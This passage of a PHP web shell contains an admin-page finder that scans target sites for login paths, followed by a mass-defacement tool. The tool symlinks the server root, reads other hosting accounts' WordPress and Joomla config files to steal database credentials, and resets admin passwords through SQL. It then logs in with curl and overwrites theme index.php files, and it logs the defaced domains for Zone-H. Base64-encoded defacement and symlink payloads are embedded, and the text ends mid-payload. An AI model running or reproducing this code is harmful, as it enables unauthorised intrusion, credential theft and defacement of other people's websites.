2100. members/
2101. login-redirect/
2102. sub-login/
2103. wp-login.php
2104. login1/
2105. dir-login/
2106. login_db/
2107. xlogin/
2108. smblogin/
2109. customer_login/
2110. UserLogin/
2111. login-us/
2112. acct_login/
2113. admin_area/
2114. bigadmin/
2115. project-admins/
2116. phppgadmin/
2117. pureadmin/
2118. sql-admin/
2119. radmind/
2120. openvpnadmin/
2121. wizmysqladmin/
2122. vadmind/
2123. ezsqliteadmin/
2124. hpwebjetadmin/
2125. newsadmin/
2126. adminpro/
2127. Lotus_Domino_Admin/
2128. bbadmin/
2129. vmailadmin/
2130. Indy_admin/
2131. ccp14admin/
2132. irc-macadmin/
2133. banneradmin/
2134. sshadmin/
2135. phpldapadmin/
2136. macadmin/
2137. administratoraccounts/
2138. admin4_account/
2139. admin4_colon/
2140. radmind-1/
2141. Super-Admin/
2142. AdminTools/
2143. cmsadmin/
2144. SysAdmin2/
2145. globes_admin/
2146. cadmins/
2147. phpSQLiteAdmin/
2148. navSiteAdmin/
2149. server_admin_small/
2150. logo_sysadmin/
2151. server/
2152. database_administration/
2153. power_user/
2154. system_administration/
2155. ss_vms_admin_sm/
2156. adminarea/
2157. bb-admin/
2158. adminLogin/
2159. panel-administracion/
2160. instadmin/
2161. memberadmin/
2162. administratorlogin/
2163. admin/admin.php
2164. admin_area/admin.php
2165. admin_area/login.php
2166. siteadmin/login.php
2167. siteadmin/index.php
2168. siteadmin/login.html
2169. admin/admin.html
2170. admin_area/index.php
2171. bb-admin/index.php
2172. bb-admin/login.php
2173. bb-admin/admin.php
2174. admin_area/login.html
2175. admin_area/index.html
2176. admincp/index.asp
2177. admincp/login.asp
2178. admincp/index.html
2179. webadmin/index.html
2180. webadmin/admin.html
2181. webadmin/login.html
2182. admin/admin_login.html
2183. admin_login.html
2184. panel-administracion/login.html
2185. nsw/admin/login.php
2186. webadmin/login.php
2187. admin/admin_login.php
2188. admin_login.php
2189. admin_area/admin.html
2190. pages/admin/admin-login.php
2191. admin/admin-login.php
2192. admin-login.php
2193. bb-admin/index.html
2194. bb-admin/login.html
2195. bb-admin/admin.html
2196. admin/home.html
2197. pages/admin/admin-login.html
2198. admin/admin-login.html
2199. admin-login.html
2200. admin/adminLogin.html
2201. adminLogin.html
2202. home.html
2203. rcjakar/admin/login.php
2204. adminarea/index.html
2205. adminarea/admin.html
2206. webadmin/index.php
2207. webadmin/admin.php
2208. user.html
2209. modelsearch/login.html
2210. adminarea/login.html
2211. panel-administracion/index.html
2212. panel-administracion/admin.html
2213. modelsearch/index.html
2214. modelsearch/admin.html
2215. admincontrol/login.html
2216. adm/index.html
2217. adm.html
2218. user.php
2219. panel-administracion/login.php
2220. wp-login.php
2221. adminLogin.php
2222. admin/adminLogin.php
2223. home.php
2224. adminarea/index.php
2225. adminarea/admin.php
2226. adminarea/login.php
2227. panel-administracion/index.php
2228. panel-administracion/admin.php
2229. modelsearch/index.php
2230. modelsearch/admin.php
2231. admincontrol/login.php
2232. adm/admloginuser.php
2233. admloginuser.php
2234. admin2/login.php
2235. admin2/index.php
2236. adm/index.php
2237. adm.php
2238. affiliate.php
2239. adm_auth.php
2240. memberadmin.php
2241. administratorlogin.php
2242. admin/admin.asp
2243. admin_area/admin.asp
2244. admin_area/login.asp
2245. admin_area/index.asp
2246. bb-admin/index.asp
2247. bb-admin/login.asp
2248. bb-admin/admin.asp
2249. pages/admin/admin-login.asp
2250. admin/admin-login.asp
2251. admin-login.asp
2252. user.asp
2253. webadmin/index.asp
2254. webadmin/admin.asp
2255. webadmin/login.asp
2256. admin/admin_login.asp
2257. admin_login.asp
2258. panel-administracion/login.asp
2259. adminLogin.asp
2260. admin/adminLogin.asp
2261. home.asp
2262. adminarea/index.asp
2263. adminarea/admin.asp
2264. adminarea/login.asp
2265. panel-administracion/index.asp
2266. panel-administracion/admin.asp
2267. modelsearch/index.asp
2268. modelsearch/admin.asp
2269. admincontrol/login.asp
2270. adm/admloginuser.asp
2271. admloginuser.asp
2272. admin2/login.asp
2273. admin2/index.asp
2274. adm/index.asp
2275. adm.asp
2276. affiliate.asp
2277. adm_auth.asp
2278. memberadmin.asp
2279. administratorlogin.asp
2280. siteadmin/login.asp
2281. siteadmin/index.asp
2282. ADMIN/
2283. paneldecontrol/
2284. login/
2285. cms/
2286. admon/
2287. ADMON/
2288. administrador/
2289. ADMIN/login.php
2290. panelc/
2291. ADMIN/login.html";
2292. function template() {
2293. echo '
2294.  
2295. <script type="text/javascript">
2296. <!--
2297. function insertcode($text, $place, $replace)
2298. {
2299.    var $this = $text;
2300.    var logbox = document.getElementById($place);
2301.    if($replace == 0)
2302.        document.getElementById($place).innerHTML = logbox.innerHTML+$this;
2303.    else
2304.        document.getElementById($place).innerHTML = $this;
2305. //document.getElementById("helpbox").innerHTML = $this;
2306. }
2307. -->
2308. </script>
2309. <br>
2310. <br>
2311. <h1 class="technique-two">
2312.  
2313.  
2314.  
2315. </h1>
2316.  
2317. <div class="wrapper">
2318. <div class="red">
2319. <div class="tube">
2320. <center><table class="tabnet"><th colspan="2">Admin Finder</th><tr><td>
2321. <form action="" method="post" name="xploit_form">
2322.  
2323. <tr>
2324. <tr>
2325.     <b><td>URL</td>
2326.     <td><input class="inputz" type="text" name="xploit_url" value="'.$_POST['xploit_url'].'" style="width: 350px;" />
2327.     </td>
2328. </tr><tr>
2329.     <td>404 string</td>
2330.     <td><input class="inputz" type="text" name="xploit_404string" value="'.$_POST['xploit_404string'].'" style="width: 350px;" />
2331.     </td></b>
2332. </tr><br><td>
2333. <span style="float: center;"><input class="inputzbut" type="submit" name="xploit_submit" value=" Start Scan" align="center" />
2334. </span></td></tr>
2335. </form></td></tr>
2336. <br /></table>
2337. </div> <!-- /tube -->
2338. </div> <!-- /red -->
2339. <br />
2340. <div class="green">
2341. <div class="tube" id="rightcol">
2342. Verificat: <span id="verified">0</span> / <span id="total">0</span><br />
2343. <b>Found ones:<br /></b>
2344. </div> <!-- /tube -->
2345. </div></center><!-- /green -->
2346. <br clear="all" /><br />
2347. <div class="blue">
2348. <div class="tube" id="logbox">
2349. <br />
2350. <br />
2351. Admin page Finder :<br /><br />
2352. </div> <!-- /tube -->
2353. </div> <!-- /blue -->
2354. </div> <!-- /wrapper -->
2355. <br clear="all"><br>';
2356. }
2357. function show($msg, $br=1, $stop=0, $place='logbox', $replace=0) {
2358.     if($br == 1) $msg .= "<br />";
2359.     echo "<script type=\"text/javascript\">insertcode('".$msg."', '".$place."', '".$replace."');</script>";
2360.     if($stop == 1) exit;
2361.     @flush();@ob_flush();
2362. }
2363. function check($x, $front=0) {
2364.     global $_POST,$site,$false;
2365.     if($front == 0) $t = $site.$x;
2366.     else $t = 'http://'.$x.'.'.$site.'/';
2367.     $headers = get_headers($t);
2368.     if (!eregi('200', $headers[0])) return 0;
2369.     $data = @file_get_contents($t);
2370.     if($_POST['xploit_404string'] == "") if($data == $false) return 0;
2371.     if($_POST['xploit_404string'] != "") if(strpos($data, $_POST['xploit_404string'])) return 0;
2372.     return 1;
2373. }
2374.  
2375. // --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2376. template();
2377. if(!isset($_POST['xploit_url'])) die;
2378. if($_POST['xploit_url'] == '') die;
2379. $site = $_POST['xploit_url'];
2380. if ($site[strlen($site)-1] != "/") $site .= "/";
2381. if($_POST['xploit_404string'] == "") $false = @file_get_contents($site."d65897f5380a21a42db94b3927b823d56ee1099a-this_can-t_exist.html");
2382. $list['end'] = str_replace("\r", "", $list['end']);
2383. $list['front'] = str_replace("\r", "", $list['front']);
2384. $pathes = explode("\n", $list['end']);
2385. $frontpathes = explode("\n", $list['front']);
2386. show(count($pathes)+count($frontpathes), 1, 0, 'total', 1);
2387. $verificate = 0;
2388. foreach($pathes as $path) {
2389.     show('Checking '.$site.$path.' : ', 0, 0, 'logbox', 0);
2390.     $verificate++; show($verificate, 0, 0, 'verified', 1);
2391.     if(check($path) == 0) show('not found', 1, 0, 'logbox', 0);
2392.     else{
2393.         show('<span style="color: #FFFFFF;"><strong>found</strong></span>', 1, 0, 'logbox', 0);
2394.         show('<a href="'.$site.$path.'">'.$site.$path.'</a>', 1, 0, 'rightcol', 0);
2395.     }
2396. }
2397. preg_match("/\/\/(.*?)\//i", $site, $xx); $site = $xx[1];
2398. if(substr($site, 0, 3) == "www") $site = substr($site, 4);
2399. foreach($frontpathes as $frontpath) {
2400.     show('Checking http://'.$frontpath.'.'.$site.'/ : ', 0, 0, 'logbox', 0);
2401.     $verificate++; show($verificate, 0, 0, 'verified', 1);
2402.     if(check($frontpath, 1) == 0) show('not found', 1, 0, 'logbox', 0);
2403.     else{
2404.         show('<span style="color: #FFFFFF;"><strong>found</strong></span>', 1, 0, 'logbox', 0);
2405.         show('<a href="http://'.$frontpath.'.'.$site.'/">'.$frontpath.'.'.$site.'</a>', 1, 0, 'rightcol', 0);
2406.   }
2407.  
2408. }
2409. }elseif($_GET['do'] == 'ngindexx') {
2410.     {error_reporting(0);function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){$ar0=explode($marqueurDebutLien, $text);$ar1=explode($marqueurFinLien, $ar0[$i]);return trim($ar1[0]);}function randomt() {$chars = "abcdefghijkmnopqrstuvwxyz023456789";srand((double)microtime()*1000000);$i = 0;$pass = '';while ($i <= 7) {$num = rand() % 33;$tmp = substr($chars, $num, 1);$pass = $pass . $tmp;$i++;}return $pass;}function index_changer_wp($conf, $content) {$output = '';$dol = '$';$go = 0;$username = entre2v2($conf,"define('DB_USER', '","');");$password = entre2v2($conf,"define('DB_PASSWORD', '","');");$dbname = entre2v2($conf,"define('DB_NAME', '","');");$prefix = entre2v2($conf,$dol."table_prefix  = '","'");$host = entre2v2($conf,"define('DB_HOST', '","');");$link=mysql_connect($host,$username,$password);if($link) {mysql_select_db($dbname,$link) ;$dol = '$';$req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '4297f44b13955235245b2497399d7a93' WHERE `ID` = 1");} else {$output.= "[-] DB Error<br />";}if($req1) {$req = mysql_query("SELECT * from  `".$prefix."options` WHERE option_name='home'");$data = mysql_fetch_array($req);$site_url=$data["option_value"]; $req = mysql_query("SELECT * from  `".$prefix."options` WHERE option_name='template'");$data = mysql_fetch_array($req);$template = $data["option_value"];$req = mysql_query("SELECT * from  `".$prefix."options` WHERE option_name='current_theme'");$data = mysql_fetch_array($req);$current_theme = $data["option_value"];$useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";$url2=$site_url."/wp-login.php";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=123123&rememberme=forever&wp-submit=Log In&testcookie=1");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer = curl_exec($ch);$pos = strpos($buffer,"action=logout");if($pos === false) {$output.= "[-] Login Error<br />";} else {$output.= "[+] Login Successful<br />";$go = 1;}if($go) {$cond = 0;$url2=$site_url."/wp-admin/theme-editor.php?file=/themes/".$template.'/index.php&theme='.urlencode($current_theme).'&dir=theme';curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer0 = curl_exec($ch);$_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');$_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');if(substr_count($_file,"/index.php") != 0){$output.= "[+] index.php loaded in Theme Editor<br />";$url2=$site_url."/wp-admin/theme-editor.php";curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'<div id="message" class="updated">');if($pos === false) {$output.= "[-] Updating Index.php Error<br />";} else {$output.= "[+] Index.php Updated Successfuly<br />";$hk = explode('public_html',$_file);$output.= '[+] Deface '.file_get_contents($site_url.str_replace('/blog','',$hk[1]));$cond = 1;}} else {$url2=$site_url.'/wp-admin/theme-editor.php?file=index.php&theme='.$template;curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer0 = curl_exec($ch);$_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');$_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');if(substr_count($_file,"index.php") != 0){$output.= "[+] index.php loaded in Theme Editor<br />";$url2=$site_url."/wp-admin/theme-editor.php";curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&theme=".$template."&_wpnonce=".$_wpnonce."&submit=Update File");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'<div id="message" class="updated">');if($pos === false) {$output.= "[-] Updating Index.php Error<br />";} else {$output.= "[+] Index.php Template Updated Successfuly<br />";$output.= '[+] Deface '.file_get_contents($site_url.'/wp-content/themes/'.$template.'/index.php');$cond = 1;}} else {$output.= "[-] index.php can not load in Theme Editor<br />";}}}} else {$output.= "[-] DB Error<br />";}global $base_path;unlink($base_path.'COOKIE.txt');return array('cond'=>$cond, 'output'=>$output);}function index_changer_joomla($conf, $content, $domain) {$doler = '$';$username = entre2v2($conf, $doler."user = '", "';");$password = entre2v2($conf, $doler."password = '", "';");$dbname = entre2v2($conf, $doler."db = '", "';");$prefix = entre2v2($conf, $doler."dbprefix = '", "';");$host = entre2v2($conf, $doler."host = '","';");$co=randomt();$site_url = "http://".$domain."/administrator";$output = '';$cond = 0; $link=mysql_connect($host, $username, $password);if($link) {mysql_select_db($dbname,$link) ;$req1 = mysql_query("UPDATE `".$prefix."users` SET `username` ='admin' , `password` = '4297f44b13955235245b2497399d7a93', `usertype` = 'Super Administrator', `block` = 0");$req = mysql_numrows(mysql_query("SHOW TABLES LIKE '".$prefix."extensions'"));} else {$output.= "[-] DB Error<br />";}if($req1){if ($req) {$req = mysql_query("SELECT * from  `".$prefix."template_styles` WHERE `client_id` = '0' and `home` = '1'");$data = mysql_fetch_array($req);$template_name = $data["template"];$req = mysql_query("SELECT * from  `".$prefix."extensions` WHERE `name`='".$template_name."' or `element` = '".$template_name."'");$data = mysql_fetch_array($req);$template_id = $data["extension_id"];$url2=$site_url."/index.php";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$return = entre2v2($buffer ,'<input type="hidden" name="return" value="','"');$hidden = entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);if($return && $hidden) {curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_REFERER, $url2);curl_setopt($ch, CURLOPT_POSTFIELDS, "username=admin&passwd=123123&option=com_login&task=login&return=".$return."&".$hidden."=1");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$pos = strpos($buffer,"com_config");if($pos === false) {$output.= "[-] Login Error<br />";} else {$output.= "[+] Login Successful<br />";}}if($pos){$url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);if($hidden2) {$output.= "[+] index.php file found in Theme Editor<br />";} else {$output.= "[-] index.php Not found in Theme Editor<br />";}}if($hidden2) {$url2=$site_url."/index.php?option=com_templates&layout=edit";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$content."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'<dd class="message message">');$cond = 0;if($pos === false) {$output.= "[-] Updating Index.php Error<br />";} else {$output.= "[+] Index.php Template successfully saved<br />";$cond = 1;}}} else {$req =mysql_query("SELECT * from  `".$prefix."templates_menu` WHERE client_id='0'");$data = mysql_fetch_array($req);$template_name=$data["template"];$useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";$url2=$site_url."/index.php";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);if($hidden) {curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456&option=com_login&task=login&".$hidden."=1");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$pos = strpos($buffer,"com_config");if($pos === false) {$output.= "[-] Login Error<br />";} else {$output.= "[+] Login Successful<br />";}}if($pos) {$url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);if($hidden2) {$output.= "[+] index.php file founded in Theme Editor<br />";} else {$output.= "[-] index.php Not found in Theme Editor<br />";}}if($hidden2) {$url2=$site_url."/index.php?option=com_templates&layout=edit";curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$content."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co);$buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'<dd class="message message fade">');$cond = 0;if($pos === false) {$output.= "[-] Updating Index.php Error<br />";} else {$output.= "[+] Index.php Template successfully saved<br />";$cond = 1;}}}} else {$output.= "[-] DB Error<br />";}global $base_path;unlink($base_path.$co);return array('cond'=>$cond, 'output'=>$output); }function exec_mode_1($def_url) {@mkdir('sym',0777);$wr  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";$fp = @fopen ('sym/.htaccess','w');fwrite($fp, $wr);@symlink('/','sym/root');$dominios = @file_get_contents("/etc/named.conf");@preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);$out[1] = array_unique($out[1]);$numero_dominios = count($out[1]);echo "Total domains: $numero_dominios <br><br />";$def = file_get_contents($def_url);$def = urlencode($def);$dd = 'PD9waHANCiRkZWYgPSBmaWxlX2dldF9jb250ZW50cygnaHR0cDovL3pvbmVobWlycm9ycy5vcmcvZGVmYWNlZC8yMDEzLzAzLzE5L2Fzc29jaWFwcmVzcy5uZXQnKTsNCiRwID0gZXhwbG9kZSgncHVibGljX2h0bWwnLGRpcm5hbWUoX19GSUxFX18pKTsNCiRwID0gJHBbMF0uJ3B1YmxpY19odG1sJzsNCmlmICgkaGFuZGxlID0gb3BlbmRpcigkcCkpIHsNCiAgICAkZnAxID0gQGZvcGVuKCRwLicvaW5kZXguaHRtbCcsJ3crJyk7DQogICAgQGZ3cml0ZSgkZnAxLCAkZGVmKTsNCiAgICAkZnAxID0gQGZvcGVuKCRwLicvaW5kZXgucGhwJywndysnKTsNCiAgICBAZndyaXRlKCRmcDEsICRkZWYpOw0KICAgICRmcDEgPSBAZm9wZW4oJHAuJy9pbmRleC5odG0nLCd3KycpOw0KICAgIEBmd3JpdGUoJGZwMSwgJGRlZik7DQogICAgZWNobyAnRG9uZSc7DQp9DQpjbG9zZWRpcigkaGFuZGxlKTsNCnVubGluayhfX0ZJTEVfXyk7DQo/Pg==';$base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/sym/root/home/';$output = fopen('defaced.html', 'a+');$_SESSION['count1'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count1']) ? $_SESSION['count1'] :0 ) : 0;$_SESSION['count2'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count2']) ? $_SESSION['count2'] :0 ) : 0;echo '<table style="width:75%;" align="center"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';$j = 1;$st = (isset($_GET['st']) && $_GET['st']!='') ? $_GET['st'] : 0;for($i = $st; $i <= $numero_dominios; $i++){$domain = $out[1][$i];$dono_arquivo = @fileowner("/etc/valiases/".$domain);$infos = @posix_getpwuid($dono_arquivo);if($infos['name']!='root') {$config01 = @file_get_contents($base_url.$infos['name']."/public_html/configuration.php");$config02 = @file_get_contents($base_url.$infos['name']."/public_html/wp-config.php");$config03 = @file_get_contents($base_url.$infos['name']."/public_html/blog/wp-config.php");$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';if($config01 && preg_match('/dbprefix/i',$config01)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="pink">JOOMLA</font></td>';$res = index_changer_joomla($config01, $def, $domain);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$_SESSION['count1'] = $_SESSION['count1'] + 1;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}if($config02 && preg_match('/DB_NAME/i',$config02)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';$res = index_changer_wp($config02, $dd);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$_SESSION['count2'] = $_SESSION['count2'] + 1;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';if($config03 && preg_match('/DB_NAME/i',$config03)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';$res = index_changer_wp($config03, $dd);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$_SESSION['count2'] = $_SESSION['count2'] + 1;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}}}echo '</table>';echo '<hr/>';echo 'Total Defaced = '.($_SESSION['count1']+$_SESSION['count2']).' (JOOMLA = '.$_SESSION['count1'].', WORDPRESS = '.$_SESSION['count2'].')<br />';echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';if($_SESSION['count1']+$_SESSION['count2'] > 0){echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';}}function exec_mode_2($def_url) {$domains = @file_get_contents("/etc/named.conf");@preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);$out = array_unique($out[1]);$num = count($out);print("Total domains: $num<br><br />");$def = file_get_contents($def_url);$def = urlencode($def);$output = fopen('defaced.html', 'a+');$defaced = '';$count1 = 0;$count2 = 0;echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';$j = 1;$map = array();foreach($out as $d) {$info = @posix_getpwuid(fileowner("/etc/valiases/".$d));$map[$info['name']] = $d;}$dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHdkfTs
2411.   NCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2
2412.   h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19od
2413.   G1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwv
2414.   YmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRklMRSwgJy9ldGMvcGFzc3d
